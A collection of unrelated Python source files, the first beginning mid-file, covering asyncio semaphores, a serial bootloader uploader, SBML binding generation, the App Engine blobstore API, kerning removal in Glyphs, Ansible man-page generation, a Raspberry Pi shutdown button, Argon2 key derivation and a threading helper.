on un-acquired lock') idx = 0 for fut in self._waiters: if idx >= n: break if not fut.done(): idx += 1 fut.set_result(False) def notify_all(self): """Wake up all threads waiting on this condition. This method acts like notify(), but wakes up all waiting threads instead of one. If the calling thread has not acquired the lock when this method is called, a RuntimeError is raised. """ self.notify(len(self._waiters)) def __enter__(self): raise RuntimeError( '"yield from" should be used as context manager expression') def __exit__(self, *args): pass def __iter__(self): # See comment in Lock.__iter__(). yield from self.acquire() return _ContextManager(self) class Semaphore: """A Semaphore implementation. A semaphore manages an internal counter which is decremented by each acquire() call and incremented by each release() call. The counter can never go below zero; when acquire() finds that it is zero, it blocks, waiting until some other thread calls release(). Semaphores also support the context management protocol. The optional argument gives the initial value for the internal counter; it defaults to 1. If the value given is less than 0, ValueError is raised. """ def __init__(self, value=1, *, loop=None): if value < 0: raise ValueError("Semaphore initial value must be >= 0") self._value = value self._waiters = collections.deque() if loop is not None: self._loop = loop else: self._loop = events.get_event_loop() def __repr__(self): res = super().__repr__() extra = 'locked' if self.locked() else 'unlocked,value:{}'.format( self._value) if self._waiters: extra = '{},waiters:{}'.format(extra, len(self._waiters)) return '<{} [{}]>'.format(res[1:-1], extra) def locked(self): """Returns True if semaphore can not be acquired immediately.""" return self._value == 0 @coroutine def acquire(self): """Acquire a semaphore. If the internal counter is larger than zero on entry, decrement it by one and return True immediately. If it is zero on entry, block, waiting until some other coroutine has called release() to make it larger than 0, and then return True. """ if not self._waiters and self._value > 0: self._value -= 1 return True fut = futures.Future(loop=self._loop) self._waiters.append(fut) try: yield from fut self._value -= 1 return True finally: self._waiters.remove(fut) def release(self): """Release a semaphore, incrementing the internal counter by one. When it was zero on entry and another coroutine is waiting for it to become larger than zero again, wake up that coroutine. """ self._value += 1 for waiter in self._waiters: if not waiter.done(): waiter.set_result(True) break def __enter__(self): raise RuntimeError( '"yield from" should be used as context manager expression') def __exit__(self, *args): pass def __iter__(self): # See comment in Lock.__iter__(). yield from self.acquire() return _ContextManager(self) class BoundedSemaphore(Semaphore): """A bounded semaphore implementation. This raises ValueError in release() if it would increase the value above the initial value. """ def __init__(self, value=1, *, loop=None): self._bound_value = value super().__init__(value, loop=loop) def release(self): if self._value >= self._bound_value: raise ValueError('BoundedSemaphore released too many times') super().release()
import argparse import os import math import serial import xmodem import progressbar parser = argparse.ArgumentParser() parser.add_argument("port", help="Serial port used to communicate with OBC") parser.add_argument("file", help="Binary file to upload") parser.add_argument("description", help="Description for binary") parser.add_argument("index", help="Slot for binary file (0-5)", nargs='+') parser.add_argument("--nowait", required=False, help="No wait for bootloader", action='store_true') args = parser.parse_args() class Bootloader: def __init__(self, port): self._port = port def wait(self): self._wait_for('&') self._port.write('S') self._wait_for(':') self._port.write('\n') self._wait_for('#') def upload_binary(self, index, description, stream): # type: (int, str, file) -> bool self._port.write('x') self._wait_for('Boot Index: ') self._port.write(str(index)) self._wait_for('Upload Binary: ') widgets = [ 'Uploading to slot %d ' % index, progressbar.Percentage(), ' ', progressbar.Bar(marker='#', left='[', right=']'), ' ', progressbar.ETA(), ' ', progressbar.FileTransferSpeed(), ] file_size = os.fstat(f.fileno()).st_size with progressbar.ProgressBar(widgets=widgets, max_value=file_size) as bar: modem = xmodem.XMODEM(getc=self._xmodem_getc, putc=self._xmodem_putc) r = modem.send(stream, quiet=True, callback=self._xmodem_report_progress(bar, file_size)) if not r: print 'Upload failed!' return False self._wait_for('Boot Description: ') self._port.write(description) self._port.write('\0\n') self._wait_for('Done!') def _wait_for(self, marker): s = '' while not s.endswith(marker): s += self._port.read(1) def _xmodem_getc(self, size, timeout=1): d = self._port.read(size) return d def _xmodem_putc(self, data, timeout=1): l = self._port.write(data) return l def _xmodem_report_progress(self, bar, file_size): # type: (progressbar.ProgressBar, int) -> function def report(_, success_count, error_count): packet_size = 128 transferred_size = min([file_size, packet_size * success_count]) bar.update(transferred_size) return report def verify_correct_format(file): header = file.read(4) if header[0] == ':': print "Selected HEX file, you have to select BIN file" return False elif 'ELF' in header: print "Selected ELF file, you have to select BIN file" return False file.seek(0) return True with file(args.file, 'rb') as f: if not verify_correct_format(f): exit(1) port = serial.Serial(port=args.port, baudrate=115200) print args bootloader = Bootloader(port) if args.nowait == False: print 'Waiting for bootloader' bootloader.wait() print 'Bootloader ready' else: print 'User claims that bootloader is ready' for slot in args.index: with file(args.file, 'rb') as f: bootloader.upload_binary(int(slot), args.description, f)
#!/usr/bin/env python # # @file CMakeFiles.py # @brief class for generating the cmake files # @author Frank Bergmann # @author Sarah Keating # # <!-------------------------------------------------------------------------- # # Copyright (c) 2013-2015 by the California Institute of Technology # (California, USA), the European Bioinformatics Institute (EMBL-EBI, UK) # and the University of Heidelberg (Germany), with support from the National # Institutes of Health (USA) under grant R01GM070923. All rights reserved. # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the "Software"), # to deal in the Software without restriction, including without limitation # the rights to use, copy, modify, merge, publish, distribute, sublicense, # and/or sell copies of the Software, and to permit persons to whom the # Software is furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL # THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING # FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER # DEALINGS IN THE SOFTWARE. # # Neither the name of the California Institute of Technology (Caltech), nor # of the European Bioinformatics Institute (EMBL-EBI), nor of the University # of Heidelberg, nor the names of any contributors, may be used to endorse # or promote products derived from this software without specific prior # written permission. # ------------------------------------------------------------------------ --> from util import global_variables from . import DowncastExtensionFile from . import DowncastNamespaceFile from . import DowncastPackagesFile from . import DowncastPluginsFile from . import NativeSwigFile from . import BaseBindingsFiles class BindingFiles(): """Class for all Bindings files""" def __init__(self, pkg_object, binding, verbose=False): # # members from object self.package = pkg_object['name'] self.verbose = verbose self.binding = binding self.language = global_variables.language self.elements = pkg_object['baseElements'] self.plugins = pkg_object['plugins'] ######################################################################### # package files def write_downcast_extension(self): if not global_variables.is_package: return name = 'local-downcast-extension-{0}'.format(self.package) ext = DowncastExtensionFile.DowncastExtensionFile(name, self.package, self.binding) if self.verbose: print('Writing file {0}'.format(ext.fileout.filename)) ext.write_file() ext.close_file() def write_downcast_namespace(self): if not global_variables.is_package: return name = 'local-downcast-namespaces-{0}'.format(self.package) ext = DowncastNamespaceFile.DowncastNamespaceFile(name, self.package, self.binding) if self.verbose: print('Writing file {0}'.format(ext.fileout.filename)) ext.write_file() ext.close_file() def write_downcast_packages(self): if not global_variables.is_package: return if self.binding == 'csharp' or self.binding == 'java': name = 'local-packages-{0}'.format(self.package) else: name = 'local-downcast-packages-{0}'.format(self.package) ext = DowncastPackagesFile.DowncastPackagesFile(name, self.package, self.binding, self.elements, self.plugins) if self.verbose and ext.fileout: print('Writing file {0}'.format(ext.fileout.filename)) ext.write_file() ext.close_file() def write_downcast_plugins(self): if not global_variables.is_package: return name = 'local-downcast-plugins-{0}'.format(self.package) ext = DowncastPluginsFile.DowncastPluginsFile(name, self.package, self.binding, self.plugins) if self.verbose and ext.fileout: print('Writing file {0}'.format(ext.fileout.filename)) ext.write_file() ext.close_file() ######################################################################### # local files def write_local(self): if global_variables.is_package: self.write_local_package_files() else: self.write_local_library_files() def write_local_package_files(self): if self.binding == 'csharp' or self.binding == 'java': return else: name = 'local-{0}'.format(self.package) ext = DowncastPackagesFile.DowncastPackagesFile(name, self.package, self.binding, self.elements, self.plugins, True) if self.verbose and ext.fileout: print('Writing file {0}'.format(ext.fileout.filename)) ext.write_file() ext.close_file() def write_local_library_files(self): base_files = BaseBindingsFiles.BaseBindingsFiles(self.elements, self.binding, True) base_files.write_files() ######################################################################## # write files in the swig directory def write_swig_files(self): if global_variables.is_package: self.write_swig_package_files() else: self.write_swig_library_files() def write_swig_package_files(self): name = '{0}-package'.format(self.package) ext = NativeSwigFile.NativeSwigFile(name, self.package, self.elements, self.plugins, is_header=True) if self.verbose and ext.fileout: print('Writing file {0}'.format(ext.fileout.filename)) ext.write_file() ext.close_file() name = '{0}-package'.format(self.package) ext = NativeSwigFile.NativeSwigFile(name, self.package, self.elements, self.plugins, is_header=False) if self.verbose and ext.fileout: print('Writing file {0}'.format(ext.fileout.filename)) ext.write_file() ext.close_file() def write_swig_library_files(self): base_files = BaseBindingsFiles.BaseBindingsFiles(self.elements, 'swig', True) base_files.write_files() ######################################################################## # other library files def write_cmake_file(self): if global_variables.is_package: return base_files = BaseBindingsFiles.BaseBindingsFiles(self.elements, self.binding, True) base_files.write_files() ######################################################################## def write_files(self): if self.binding != 'swig': self.write_downcast_extension() self.write_downcast_namespace() self.write_downcast_packages() self.write_downcast_plugins() self.write_local() else: self.write_swig_files()
#!/usr/bin/env python # # Copyright 2007 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # """A Python blobstore API used by app developers. Contains methods uses to interface with Blobstore API. Defines db.Key-like class representing a blob-key. Contains API part that forward to apiproxy. """ import datetime import time from google.appengine.api import apiproxy_stub_map from google.appengine.api import datastore from google.appengine.api import datastore_errors from google.appengine.api import datastore_types from google.appengine.api import api_base_pb from google.appengine.api.blobstore import blobstore_service_pb from google.appengine.runtime import apiproxy_errors __all__ = ['BLOB_INFO_KIND', 'BLOB_KEY_HEADER', 'BLOB_RANGE_HEADER', 'MAX_BLOB_FETCH_SIZE', 'UPLOAD_INFO_CREATION_HEADER', 'BlobFetchSizeTooLargeError', 'BlobKey', 'BlobNotFoundError', 'DataIndexOutOfRangeError', 'Error', 'InternalError', 'create_upload_url', 'delete', 'fetch_data', ] BlobKey = datastore_types.BlobKey BLOB_INFO_KIND = '__BlobInfo__' BLOB_KEY_HEADER = 'X-AppEngine-BlobKey' BLOB_RANGE_HEADER = 'X-AppEngine-BlobRange' MAX_BLOB_FETCH_SIZE = (1 << 20) - (1 << 15) UPLOAD_INFO_CREATION_HEADER = 'X-AppEngine-Upload-Creation' _BASE_CREATION_HEADER_FORMAT = '%Y-%m-%d %H:%M:%S' class Error(Exception): """Base blobstore error type.""" class InternalError(Error): """Raised when an internal error occurs within API.""" class BlobNotFoundError(Error): """Raised when attempting to access blob data for non-existant blob.""" class DataIndexOutOfRangeError(Error): """Raised when attempting to access indexes out of range in wrong order.""" class BlobFetchSizeTooLargeError(Error): """Raised when attempting to fetch too large a block from a blob.""" class _CreationFormatError(Error): """Raised when attempting to parse bad creation date format.""" def _ToBlobstoreError(error): """Translate an application error to a datastore Error, if possible. Args: error: An ApplicationError to translate. """ error_map = { blobstore_service_pb.BlobstoreServiceError.INTERNAL_ERROR: InternalError, blobstore_service_pb.BlobstoreServiceError.BLOB_NOT_FOUND: BlobNotFoundError, blobstore_service_pb.BlobstoreServiceError.DATA_INDEX_OUT_OF_RANGE: DataIndexOutOfRangeError, blobstore_service_pb.BlobstoreServiceError.BLOB_FETCH_SIZE_TOO_LARGE: BlobFetchSizeTooLargeError, } if error.application_error in error_map: return error_map[error.application_error](error.error_detail) else: return error def _format_creation(stamp): """Format an upload creation timestamp with milliseconds. This method is necessary to format a timestamp with microseconds on Python versions before 2.6. Cannot simply convert datetime objects to str because the microseconds are stripped from the format when set to 0. The upload creation date format will always have microseconds padded out to 6 places. Args: stamp: datetime.datetime object to format. Returns: Formatted datetime as Python 2.6 format '%Y-%m-%d %H:%M:%S.%f'. """ return '%s.%06d' % (stamp.strftime(_BASE_CREATION_HEADER_FORMAT), stamp.microsecond) def _parse_creation(creation_string, field_name): """Parses upload creation string from header format. Parse creation date of the format: YYYY-mm-dd HH:MM:SS.ffffff Y: Year m: Month (01-12) d: Day (01-31) H: Hour (00-24) M: Minute (00-59) S: Second (00-59) f: Microsecond Args: creation_string: String creation date format. Returns: datetime object parsed from creation_string. Raises: _CreationFormatError when the creation string is formatted incorrectly. """ split_creation_string = creation_string.split('.', 1) if len(split_creation_string) != 2: raise _CreationFormatError( 'Could not parse creation %s in field %s.' % (creation_string, field_name)) timestamp_string, microsecond = split_creation_string try: timestamp = time.strptime(timestamp_string, _BASE_CREATION_HEADER_FORMAT) microsecond = int(microsecond) except ValueError: raise _CreationFormatError('Could not parse creation %s in field %s.' % (creation_string, field_name)) return datetime.datetime(*timestamp[:6] + tuple([microsecond])) def create_upload_url(success_path, _make_sync_call=apiproxy_stub_map.MakeSyncCall): """Create upload URL for POST form. Args: success_path: Path within application to call when POST is successful and upload is complete. _make_sync_call: Used for dependency injection in tests. """ request = blobstore_service_pb.CreateUploadURLRequest() response = blobstore_service_pb.CreateUploadURLResponse() request.set_success_path(success_path) try: _make_sync_call('blobstore', 'CreateUploadURL', request, response) except apiproxy_errors.ApplicationError, e: raise _ToBlobstoreError(e) return response.url() def delete(blob_keys, _make_sync_call=apiproxy_stub_map.MakeSyncCall): """Delete a blob from Blobstore. Args: blob_keys: Single instance or list of blob keys. A blob-key can be either a string or an instance of BlobKey. _make_sync_call: Used for dependency injection in tests. """ if isinstance(blob_keys, (basestring, BlobKey)): blob_keys = [blob_keys] request = blobstore_service_pb.DeleteBlobRequest() for blob_key in blob_keys: request.add_blob_key(str(blob_key)) response = api_base_pb.VoidProto() try: _make_sync_call('blobstore', 'DeleteBlob', request, response) except apiproxy_errors.ApplicationError, e: raise _ToBlobstoreError(e) def fetch_data(blob_key, start_index, end_index, _make_sync_call=apiproxy_stub_map.MakeSyncCall): """Fetch data for blob. See docstring for ext.blobstore.fetch_data for more details. Args: blob: BlobKey, str or unicode representation of BlobKey of blob to fetch data from. start_index: Start index of blob data to fetch. May not be negative. end_index: End index (exclusive) of blob data to fetch. Must be >= start_index. Returns: str containing partial data of blob. See docstring for ext.blobstore.fetch_data for more details. Raises: See docstring for ext.blobstore.fetch_data for more details. """ if not isinstance(start_index, (int, long)): raise TypeError('start_index must be integer.') if not isinstance(end_index, (int, long)): raise TypeError('end_index must be integer.') if isinstance(blob_key, BlobKey): blob_key = str(blob_key).decode('utf-8') elif isinstance(blob_key, str): blob_key = blob_key.decode('utf-8') elif not isinstance(blob_key, unicode): raise TypeError('Blob-key must be str, unicode or BlobKey: %s' % blob_key) if start_index < 0: raise DataIndexOutOfRangeError( 'May not fetch blob at negative index.') if end_index < start_index: raise DataIndexOutOfRangeError( 'Start index %d > end index %d' % (start_index, end_index)) fetch_size = end_index - start_index + 1 if fetch_size > MAX_BLOB_FETCH_SIZE: raise BlobFetchSizeTooLargeError( 'Blob fetch size is too large: %d' % fetch_size) request = blobstore_service_pb.FetchDataRequest() response = blobstore_service_pb.FetchDataResponse() request.set_blob_key(blob_key) request.set_start_index(start_index) request.set_end_index(end_index) try: _make_sync_call('blobstore', 'FetchData', request, response) except apiproxy_errors.ApplicationError, e: raise _ToBlobstoreError(e) return response.data()
# -*- coding: utf-8 -*- from __future__ import absolute_import from math import isinf, isnan from warnings import warn NOT_MASS_BALANCED_TERMS = {"SBO:0000627", # EXCHANGE "SBO:0000628", # DEMAND "SBO:0000629", # BIOMASS "SBO:0000631", # PSEUDOREACTION "SBO:0000632", # SINK } def check_mass_balance(model): unbalanced = {} for reaction in model.reactions: if reaction.annotation.get("SBO") not in NOT_MASS_BALANCED_TERMS: balance = reaction.check_mass_balance() if balance: unbalanced[reaction] = balance return unbalanced # no longer strictly necessary, done by optlang solver interfaces def check_reaction_bounds(model): warn("no longer necessary, done by optlang solver interfaces", DeprecationWarning) errors = [] for reaction in model.reactions: if reaction.lower_bound > reaction.upper_bound: errors.append("Reaction '%s' has lower bound > upper bound" % reaction.id) if isinf(reaction.lower_bound): errors.append("Reaction '%s' has infinite lower_bound" % reaction.id) elif isnan(reaction.lower_bound): errors.append("Reaction '%s' has NaN for lower_bound" % reaction.id) if isinf(reaction.upper_bound): errors.append("Reaction '%s' has infinite upper_bound" % reaction.id) elif isnan(reaction.upper_bound): errors.append("Reaction '%s' has NaN for upper_bound" % reaction.id) return errors def check_metabolite_compartment_formula(model): errors = [] for met in model.metabolites: if met.formula is not None and len(met.formula) > 0: if not met.formula.isalnum(): errors.append("Metabolite '%s' formula '%s' not alphanumeric" % (met.id, met.formula)) return errors
#MenuTitle: Remove Kerning Pairs for Selected Glyphs # -*- coding: utf-8 -*- from __future__ import division, print_function, unicode_literals __doc__=""" Deletes all kerning pairs with the selected glyphs, for the current master only. """ Font = Glyphs.font Master = Font.selectedFontMaster selectedLayers = Font.selectedLayers listOfIDs = [ x.parent.id for x in selectedLayers ] masterID = Master.id totalNumberOfDeletions = 0 print("Analyzing kerning pairs in %s ..." % Master.name) print("1. Pairs where selected glyphs are on the left side:") pairsToBeDeleted = [] for leftGlyphID in listOfIDs: leftGlyphName = Font.glyphForId_( leftGlyphID ).name try: # print leftGlyphID, leftGlyphName, len( Font.kerning[ masterID ][ leftGlyphID ] ) #DEBUG if leftGlyphID in Font.kerning[ masterID ]: rightGlyphIDs = Font.kerning[ masterID ][ leftGlyphID ].keys() numberOfPairs = len( rightGlyphIDs ) rightGlyphNames = [ Font.glyphForId_(x).name for x in rightGlyphIDs ] totalNumberOfDeletions += numberOfPairs print(" %s on the left: Found %i pairs ..." % ( leftGlyphName, numberOfPairs )) #print " ".join( rightGlyphNames ) #DEBUG pairsToBeDeleted.append( [leftGlyphName, rightGlyphNames] ) except Exception as e: print("-- Error while processing %s (%s)" % ( leftGlyphName, e )) print("2. Deleting these %i pairs ..." % ( totalNumberOfDeletions )) for thisDeletionGroup in pairsToBeDeleted: leftGlyphName = thisDeletionGroup[0] rightGlyphNames = thisDeletionGroup[1] for thisRightGlyphName in rightGlyphNames: try: Font.removeKerningForPair( masterID, leftGlyphName, thisRightGlyphName ) except Exception as e: print("-- Error: could not delete pair %s %s (%s)" % ( leftGlyphName, thisRightGlyphName, e )) print("3. Pairs where selected glyphs are on the right side (may take a while):") pairsToBeDeleted = [] for leftGlyphID in Font.kerning[ masterID ].keys(): for rightGlyphID in Font.kerning[ masterID ][ leftGlyphID ].keys(): if rightGlyphID in listOfIDs: pairsToBeDeleted.append( [ leftGlyphID, rightGlyphID ] ) print("4. Deleting these pairs ...") for kernPair in pairsToBeDeleted: rightGlyphName = Font.glyphForId_( kernPair[1] ).name if kernPair[0][0] == "@": # left glyph is a class leftGlyphName = kernPair[0] else: # left glyph is a glyph leftGlyphName = Font.glyphForId_( kernPair[0] ).name # print " Deleting pair: %s %s ..." % ( leftGlyphName, rightGlyphName ) try: Font.removeKerningForPair( masterID, leftGlyphName, rightGlyphName ) except Exception as e: print("-- Error: could not delete pair %s %s (%s)" % ( leftGlyphName, rightGlyphName, e )) totalNumberOfDeletions += ( len( pairsToBeDeleted ) ) print("Done: %i pairs deleted in %s." % ( totalNumberOfDeletions, Master.name ))
# coding: utf-8 # Copyright: (c) 2019, Ansible Project # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) # Make coding more python3-ish from __future__ import (absolute_import, division, print_function) __metaclass__ = type import argparse import os.path import pathlib import sys from jinja2 import Environment, FileSystemLoader from ansible.module_utils._text import to_bytes # Pylint doesn't understand Python3 namespace modules. from ..change_detection import update_file_if_different # pylint: disable=relative-beyond-top-level from ..commands import Command # pylint: disable=relative-beyond-top-level DEFAULT_TEMPLATE_FILE = pathlib.Path(__file__).parents[4] / 'docs/templates/man.j2' # from https://www.python.org/dev/peps/pep-0257/ def trim_docstring(docstring): if not docstring: return '' # Convert tabs to spaces (following the normal Python rules) # and split into a list of lines: lines = docstring.expandtabs().splitlines() # Determine minimum indentation (first line doesn't count): indent = sys.maxsize for line in lines[1:]: stripped = line.lstrip() if stripped: indent = min(indent, len(line) - len(stripped)) # Remove indentation (first line is special): trimmed = [lines[0].strip()] if indent < sys.maxsize: for line in lines[1:]: trimmed.append(line[indent:].rstrip()) # Strip off trailing and leading blank lines: while trimmed and not trimmed[-1]: trimmed.pop() while trimmed and not trimmed[0]: trimmed.pop(0) # Return a single string: return '\n'.join(trimmed) def get_options(optlist): ''' get actual options ''' opts = [] for opt in optlist: res = { 'desc': opt.help, 'options': opt.option_strings } if isinstance(opt, argparse._StoreAction): res['arg'] = opt.dest.upper() elif not res['options']: continue opts.append(res) return opts def dedupe_groups(parser): action_groups = [] for action_group in parser._action_groups: found = False for a in action_groups: if a._actions == action_group._actions: found = True break if not found: action_groups.append(action_group) return action_groups def get_option_groups(option_parser): groups = [] for action_group in dedupe_groups(option_parser)[1:]: group_info = {} group_info['desc'] = action_group.description group_info['options'] = action_group._actions group_info['group_obj'] = action_group groups.append(group_info) return groups def opt_doc_list(parser): ''' iterate over options lists ''' results = [] for option_group in dedupe_groups(parser)[1:]: results.extend(get_options(option_group._actions)) results.extend(get_options(parser._actions)) return results # def opts_docs(cli, name): def opts_docs(cli_class_name, cli_module_name): ''' generate doc structure from options ''' cli_name = 'ansible-%s' % cli_module_name if cli_module_name == 'adhoc': cli_name = 'ansible' # WIth no action/subcommand # shared opts set # instantiate each cli and ask its options cli_klass = getattr(__import__("ansible.cli.%s" % cli_module_name, fromlist=[cli_class_name]), cli_class_name) cli = cli_klass([cli_name]) # parse the common options try: cli.init_parser() except Exception: pass # base/common cli info docs = { 'cli': cli_module_name, 'cli_name': cli_name, 'usage': cli.parser.format_usage(), 'short_desc': cli.parser.description, 'long_desc': trim_docstring(cli.__doc__), 'actions': {}, 'content_depth': 2, } option_info = {'option_names': [], 'options': [], 'groups': []} for extras in ('ARGUMENTS'): if hasattr(cli, extras): docs[extras.lower()] = getattr(cli, extras) common_opts = opt_doc_list(cli.parser) groups_info = get_option_groups(cli.parser) shared_opt_names = [] for opt in common_opts: shared_opt_names.extend(opt.get('options', [])) option_info['options'] = common_opts option_info['option_names'] = shared_opt_names option_info['groups'].extend(groups_info) docs.update(option_info) # now for each action/subcommand # force populate parser with per action options def get_actions(parser, docs): # use class attrs not the attrs on a instance (not that it matters here...) try: subparser = parser._subparsers._group_actions[0].choices except AttributeError: subparser = {} depth = 0 for action, parser in subparser.items(): action_info = {'option_names': [], 'options': [], 'actions': {}} # docs['actions'][action] = {} # docs['actions'][action]['name'] = action action_info['name'] = action action_info['desc'] = trim_docstring(getattr(cli, 'execute_%s' % action).__doc__) # docs['actions'][action]['desc'] = getattr(cli, 'execute_%s' % action).__doc__.strip() action_doc_list = opt_doc_list(parser) uncommon_options = [] for action_doc in action_doc_list: # uncommon_options = [] option_aliases = action_doc.get('options', []) for option_alias in option_aliases: if option_alias in shared_opt_names: continue # TODO: use set if option_alias not in action_info['option_names']: action_info['option_names'].append(option_alias) if action_doc in action_info['options']: continue uncommon_options.append(action_doc) action_info['options'] = uncommon_options depth = 1 + get_actions(parser, action_info) docs['actions'][action] = action_info return depth action_depth = get_actions(cli.parser, docs) docs['content_depth'] = action_depth + 1 docs['options'] = opt_doc_list(cli.parser) return docs class GenerateMan(Command): name = 'generate-man' @classmethod def init_parser(cls, add_parser): parser = add_parser(name=cls.name, description='Generate cli documentation from cli docstrings') parser.add_argument("-t", "--template-file", action="store", dest="template_file", default=DEFAULT_TEMPLATE_FILE, help="path to jinja2 template") parser.add_argument("-o", "--output-dir", action="store", dest="output_dir", default='/tmp/', help="Output directory for rst files") parser.add_argument("-f", "--output-format", action="store", dest="output_format", default='man', help="Output format for docs (the default 'man' or 'rst')") parser.add_argument('cli_modules', help='CLI module name(s)', metavar='MODULE_NAME', nargs='*') @staticmethod def main(args): template_file = args.template_file template_path = os.path.expanduser(template_file) template_dir = os.path.abspath(os.path.dirname(template_path)) template_basename = os.path.basename(template_file) output_dir = os.path.abspath(args.output_dir) output_format = args.output_format cli_modules = args.cli_modules # various cli parsing things checks sys.argv if the 'args' that are passed in are [] # so just remove any args so the cli modules dont try to parse them resulting in warnings sys.argv = [sys.argv[0]] allvars = {} output = {} cli_list = [] cli_bin_name_list = [] # for binary in os.listdir('../../lib/ansible/cli'): for cli_module_name in cli_modules: binary = os.path.basename(os.path.expanduser(cli_module_name)) if not binary.endswith('.py'): continue elif binary == '__init__.py': continue cli_name = os.path.splitext(binary)[0] if cli_name == 'adhoc': cli_class_name = 'AdHocCLI' # myclass = 'AdHocCLI' output[cli_name] = 'ansible.1.rst.in' cli_bin_name = 'ansible' else: # myclass = "%sCLI" % libname.capitalize() cli_class_name = "%sCLI" % cli_name.capitalize() output[cli_name] = 'ansible-%s.1.rst.in' % cli_name cli_bin_name = 'ansible-%s' % cli_name # FIXME: allvars[cli_name] = opts_docs(cli_class_name, cli_name) cli_bin_name_list.append(cli_bin_name) cli_list = allvars.keys() doc_name_formats = {'man': '%s.1.rst.in', 'rst': '%s.rst'} for cli_name in cli_list: # template it! env = Environment(loader=FileSystemLoader(template_dir)) template = env.get_template(template_basename) # add rest to vars tvars = allvars[cli_name] tvars['cli_list'] = cli_list tvars['cli_bin_name_list'] = cli_bin_name_list tvars['cli'] = cli_name if '-i' in tvars['options']: print('uses inventory') manpage = template.render(tvars) filename = os.path.join(output_dir, doc_name_formats[output_format] % tvars['cli_name']) update_file_if_different(filename, to_bytes(manpage))
#!/usr/bin/python #above line makes the system think that the program is in python import pibrella import time import subprocess presstime = 0. def button_changed(pin): global presstime if pin.read() == 1: presstime = time.time() #print(presstime) pibrella.light.green.on() else: releasetime = time.time() timedifference = releasetime - presstime #how long the button was pressed if timedifference < 3.: pibrella.light.green.off() #start off with green light off print("start pin sequence") #start pin sequence subprocess.call(["/home/pi/startall.sh"]) else: pibrella.light.yellow.off() #light turns off when shutdown happens print("Shutdown!") #do the shutdown #subprocess.call(["echo", "shutdown -h now"]) subprocess.call(["/usr/bin/shutdown", "-h", "now"]) def lighttransition(): global presstime time.sleep(.1) #has the program wait if pibrella.button.read() == 1 or pibrella.input.a.read() == 1: #above line checks both of the buttons for changes time.sleep(.1) currenttime = time.time() timedifference = currenttime - presstime #print(timedifference, currenttime, presstime) if timedifference > 3.: #the transition between the lights to show what is going on pibrella.light.green.off() pibrella.light.yellow.on() #turns red led on to show that the program is running pibrella.light.red.on() pibrella.button.changed(button_changed) #calling the functions pibrella.input.a.changed(button_changed) #has it run the button changed function when the wired button is pressed pibrella.loop(lighttransition) pibrella.pause()
#!/usr/bin/env python # -*- coding: utf-8 -*- # Cryptoshop Strong file encryption. # Encrypt and decrypt file in GCM mode with AES, Serpent or Twofish as secure as possible. # Copyright(C) 2016 CORRAIRE Fabrice. [email protected] # ############################################################################ # This file is part of Cryptoshop-GUI (full Qt5 gui for Cryptoshop). # # Cryptoshop is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Cryptoshop is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Cryptoshop. If not, see <http://www.gnu.org/licenses/>. # ############################################################################ import argon2 from ._settings import __argon2_memory_cost__, __argon2_parallelism__, __argon2_timing_cost__ def calc_derivation(passphrase, salt): """ Calculate a 32 bytes key derivation with Argon2. :param passphrase: A string of any length specified by user. :param salt: 512 bits generated by Botan Random Number Generator. :return: a 32 bytes keys. """ argonhash = argon2.low_level.hash_secret_raw((str.encode(passphrase)), salt=salt, hash_len=32, time_cost=__argon2_timing_cost__, memory_cost=__argon2_memory_cost__, parallelism=__argon2_parallelism__, type=argon2.low_level.Type.I) return argonhash def calc_derivation_formated(passphrase, salt): """ Calculate a 32 bytes key derivation with Argon2. :param passphrase: A string of any length specified by user. :param salt: 512 bits generated by Botan Random Number Generator. :return: a 32 bytes keys. """ argonhash = argon2.low_level.hash_secret((str.encode(passphrase)), salt=salt, hash_len=32, time_cost=__argon2_timing_cost__, memory_cost=__argon2_memory_cost__, parallelism=__argon2_parallelism__, type=argon2.low_level.Type.I) return argonhash
import sys import traceback import threading from gi.repository import GLib from lutris.util.log import logger class AsyncCall(threading.Thread): def __init__(self, function, callback=None, *args, **kwargs): """Execute `function` in a new thread then schedule `callback` for execution in the main loop. """ self.stop_request = threading.Event() super(AsyncCall, self).__init__(target=self.target, args=args, kwargs=kwargs) self.function = function self.callback = callback if callback else lambda r, e: None self.daemon = kwargs.pop('daemon', True) self.start() def target(self, *args, **kwargs): result = None error = None try: result = self.function(*args, **kwargs) except Exception as err: logger.error("Error while completing task %s: %s", self.function, err) error = err ex_type, ex_value, tb = sys.exc_info() print(ex_type, ex_value) traceback.print_tb(tb) GLib.idle_add(lambda: self.callback(result, error))
